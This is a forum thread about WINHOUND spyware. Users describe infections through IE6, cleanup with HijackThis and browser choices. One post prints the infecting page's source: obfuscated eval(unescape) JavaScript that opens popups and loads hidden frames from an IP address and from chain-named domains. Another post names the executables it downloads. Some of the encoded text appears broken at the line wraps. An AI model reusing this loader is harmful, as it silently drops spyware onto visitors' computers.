Gah! Beware of WINHOUND, new spyware

[Lucky]

hijacks your system through a webpage exploit, places an ad on the desktop for www.winhound.com, a spyware removal program.

it even blocks the deletion of it's registry keys...

 

[mchammer]

what did you click on?

 

[Lucky]

The last link on this google page search

rather my fiance did, but that does not matter.

 

[Pepsi90919]

Originally posted by: Lucky
The last link on this google page search

rather my fiance did, but that does not matter.

fiancee

 

[halik]

use firefox?

 

[acemcmac]

yeeah, what browser were you in?

 

[Kaervak]

Got nothing in Opera.

 

[Lucky]

IE6.

If you google winhood and search deeply (I don't care to again) there are a couple malware sites that explain what it is a bit deeper. It's fairly new, out within the past 2 weeks.

 

[mchammer]

hmm, anyone want to look at the page source and see what it is trying to do? Unless there is an unpatched vulnerability in your browser, it should be impossible for something to come in, that said I don't want to try it!

 

[CKent]

Not trying to turn this into a software forum thread, but the merits of using a browser simply because it's not by far the most popular one are more than enough to warrant doing so.

 

[Goosemaster]

woah...an applet loaded and two programs tried to run...

 

[Goosemaster]

src:

<html>
<head>
<SCRIPT language=JavaScript TYPE="text/javascript">
<!--
eval(unescape("%76%61%72%20%65%66%3d%30%3b%76%61%72%20%74%6f%64%61%79%44%61%74%
5%3d%6e%65%77%20%44%61%74%65%28%29%3b%74%6f%64%61%79%44%61%74%65%2e%73%65%74%44
61%74%65%28%74%6f%64%61%79%44%61%74%65%2e%67%65%74%44%61%74%65%28%29%2b%31%29%3
%6e%44%61%74%61%3d%74%6f%64%61%79%44%61%74%65%2e%74%6f%47%4d%54%53%74%72%69%6e%
7%28%29%3b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%20%3d%20%27%48%35%55%35
52%76%7a%4d%3d%32%38%31%32%39%3b%20%65%78%70%69%72%65%73%3d%27%2b%6e%44%61%74%6
%2b%27%3b%27%3b%20%76%61%72%20%45%78%5f%70%70%3d%27%68%74%74%70%3a%2f%2f%76%69%
4%65%6f%78%79%7a%2e%63%6f%6d%2f%70%6f%70%75%70%2e%70%68%70%27%3b%20%76%61%72%20
55%73%65%5f%6f%62%6a%3d%66%61%6c%73%65%3b%20%76%61%72%20%70%70%5f%6f%62%6a%3d%6
%68%5f%76%65%72%28%29%3b%20%66%75%6e%63%74%69%6f%6e%20%73%65%6c%5f%70%70%28%75%
2%6c%29%7b%20%75%72%6c%3d%45%78%5f%70%70%3b%20%69%66%20%28%70%70%5f%6f%62%6a%29
7b%20%68%5f%70%70%28%75%72%6c%29%3b%20%7d%20%65%6c%73%65%20%7b%20%75%5f%70%70%2
%75%72%6c%29%3b%20%7d%7d%20%66%75%6e%63%74%69%6f%6e%20%68%5f%70%70%28%75%72%6c%
9%7b%20%20%69%66%20%28%55%73%65%5f%6f%62%6a%29%7b%20%20%68%5f%70%70%28%27%22%2b
75%72%6c%2b%22%27%29%3b%20%20%72%65%74%75%72%6e%3b%20%7d%20%55%73%65%5f%6f%62%6
%3d%74%72%75%65%3b%20%74%72%79%20%7b%20%70%70%5f%6f%62%6a%2e%6c%61%75%6e%63%68%
5%52%4c%28%75%72%6c%29%3b%20%7d%20%63%61%74%63%68%28%65%29%20%7b%20%75%5f%70%70
28%75%72%6c%29%3b%20%7d%20%55%73%65%5f%6f%62%6a%3d%66%61%6c%73%65%3b%7d%20%66%7
%6e%63%74%69%6f%6e%20%75%5f%70%70%28%75%72%6c%29%7b%20%74%72%79%7b%20%20%65%76%
1%6c%28%22%77%69%6e%64%22%2b%22%6f%77%2e%6f%70%22%2b%22%65%6e%28%27%22%2b%75%72
6c%2b%22%27%2c%27%5f%62%6c%22%2b%22%61%6e%6b%27%29%3b%22%29%3b%20%7d%20%63%61%7
%63%68%28%65%29%20%7b%20%20%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%75%72%6c%2c%27%
f%62%6c%61%6e%6b%27%29%3b%20%7d%7d%20%66%75%6e%63%74%69%6f%6e%20%63%68%5f%76%65
72%28%29%7b%20%69%66%20%28%20%77%69%6e%64%6f%77%2e%6f%70%65%72%61%20%29%20%72%6
%74%75%72%6e%3b%20%69%66%20%28%77%69%6e%64%6f%77%2e%6e%61%76%69%67%61%74%6f%72%
e%75%73%65%72%41%67%65%6e%74%2e%69%6e%64%65%78%4f%66%28%22%4d%53%49%45%22%29%20
3d%3d%20%2d%31%29%20%72%65%74%75%72%6e%3b%20%69%66%20%28%77%69%6e%64%6f%77%2e%6
%61%76%69%67%61%74%6f%72%2e%75%73%65%72%41%67%65%6e%74%2e%69%6e%64%65%78%4f%66%
8%22%53%56%31%22%29%20%3d%3d%20%2d%31%29%20%72%65%74%75%72%6e%3b%20%76%61%72%20
71%3d%22%3c%6f%62%22%3b%20%71%2b%3d%22%6a%65%63%74%20%69%64%3d%27%61%6c%75%27%2
%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%20%63%6c%61%73%73%69%64%3d%27%
3%22%3b%20%71%2b%3d%22%4c%53%49%44%3a%36%42%46%35%32%41%35%32%2d%33%39%34%41%2d
31%31%22%3b%20%71%2b%3d%22%44%33%2d%42%31%35%33%2d%30%30%43%30%34%46%37%39%46%4
%41%36%27%3e%3c%2f%6f%62%22%3b%20%71%2b%3d%22%6a%65%63%74%3e%22%3b%20%20%64%6f%
3%75%6d%65%6e%74%2e%77%72%69%74%65%28%71%29%3b%20%72%65%74%75%72%6e%20%64%6f%63
75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%27%61%6c%75%27%2
%3b%7d%20%6f%6e%62%65%66%6f%72%65%75%6e%6c%6f%61%64%3d%73%65%6c%5f%70%70%3b")); //-->
</SCRIPT>
</head>
<SCRIPT language=JavaScript TYPE="text/javascript">
<!--
window.document.open();
window.document.write("<frameset rows='*,0,0,0,0' cols='*' frameborder=0>");
window.document.write("<frame name=mainframe src='http://www.searchadv.com/search.php?aid...id=kuxnja&q=andrew%20mahler%20michigan' frameborder=0 noresize>");
eval(unescape("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%32%30%39%2e%36%36%2e%31%32%32%2e%34%39%2f%63%6e%74%2f%70%72%6f%63%65%73%73%6f%72%3f%61%72%61%6c%65%6c%22%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%20%6e%6f%72%65%73%69%7a%65%3e%3c%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6c%65%61%6e%63%68%61%69%6e%2e%6e%65%74%2f%66%72%2f%3f%69%64%3d%75%73%32%34%22%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%20%6e%6f%72%65%73%69%7a%65%3e%3c%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%66%75%6c%6c%63%68%61%69%6e%2e%6e%65%74%2f%66%72%2f%3f%69%64%3d%75%73%32%34%22%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%20%6e%6f%72%65%73%69%7a%65%3e%27%29%3b")); window.document.write("</frameset>");
window.document.close();
//-->
</SCRIPT>
</html>

 

[gw186]

I just cleaned this crap off my nephew's computer. Said he didnt click anything, but who knows.

 

[mchammer]

Goose, did it ask you to click anything?

 

[WobbleWobble]

I just cleaned this off my friend's computer today. I tried the deleting folder/registry keys, not allowed. Use Hijackthis to remove it and then I was able to registry entries.

 

[Pocahontas]

I never clicked anything, a bad day was made wayyy worse with this crappy virus. I found out that person, umm #5 in a two year span has commited suicide tonight.

I was leaving a message on a guestbook and saw an old friend too. I then tried to google him, trying to get an e mail, ran through the pages and got to the last link, freaked out when browers started popping oepn. I tried to get them all closed down and boom, virus had hit. Lucky was home thank God to salvage my pc after a few hours. YUCK!!

May you now rest in eternal peace BPR.

 

[jiwq]

ok, so if a search result's text has seemingly noncoherent babble, don't click on it. you won't be spared even if you click on the cached versions (while using IE). they're all keyword pool sites that toss together random words in hopes that you run a search and click on their result.

 

[EKKC]

i wonder what programmer in their sick mind would make spyware, they should have their fingers cut off and exiled somewhere in some island like LOST without access to any computers or electronic equipment

 

[ribbon13]

Originally posted by: EKKC
i wonder what programmer in their sick mind would make spyware, they should have their fingers cut off and exiled somewhere in some island like LOST without access to any computers or electronic equipment

People like you would deprive the world of people like Kevin Mitnick?

 

[imported_hscorpio]

If you use firefox, you can see two programs try to run. one is gdnUS2161.exe from 85.255.115.226 and the other is zuz00.exe from content-loader.com.

 

[mchammer]

Originally posted by: Pocahontas
I never clicked anything, a bad day was made wayyy worse with this crappy virus. I found out that person, umm #5 in a two year span has commited suicide tonight.

I was leaving a message on a guestbook and saw an old friend too. I then tried to google him, trying to get an e mail, ran through the pages and got to the last link, freaked out when browers started popping oepn. I tried to get them all closed down and boom, virus had hit. Lucky was home thank God to salvage my pc after a few hours. YUCK!!

May you now rest in eternal peace BPR.

First, I'm sorry to hear of this misfortune wrt the suicides.

Then I wonder what avenue this gets in by. Supposedly nothing can get in automatically if a person is up to date on their patches and has not lowered any security settings...

 

[ElFenix]

Originally posted by: ribbon13

Originally posted by: EKKC
i wonder what programmer in their sick mind would make spyware, they should have their fingers cut off and exiled somewhere in some island like LOST without access to any computers or electronic equipment

People like you would deprive the world of people like Kevin Mitnick?

what has mitnick ever done for the world?

 

[Lucky]

more info

 

[Freejack2]

Correct me if I'm wrong but that IE6 hole that allows executables to be run through some Javascript exploit, is still unpatched isn't it?

 

[Lucky]

I don't know for sure, but windows update did not have any new updates for it.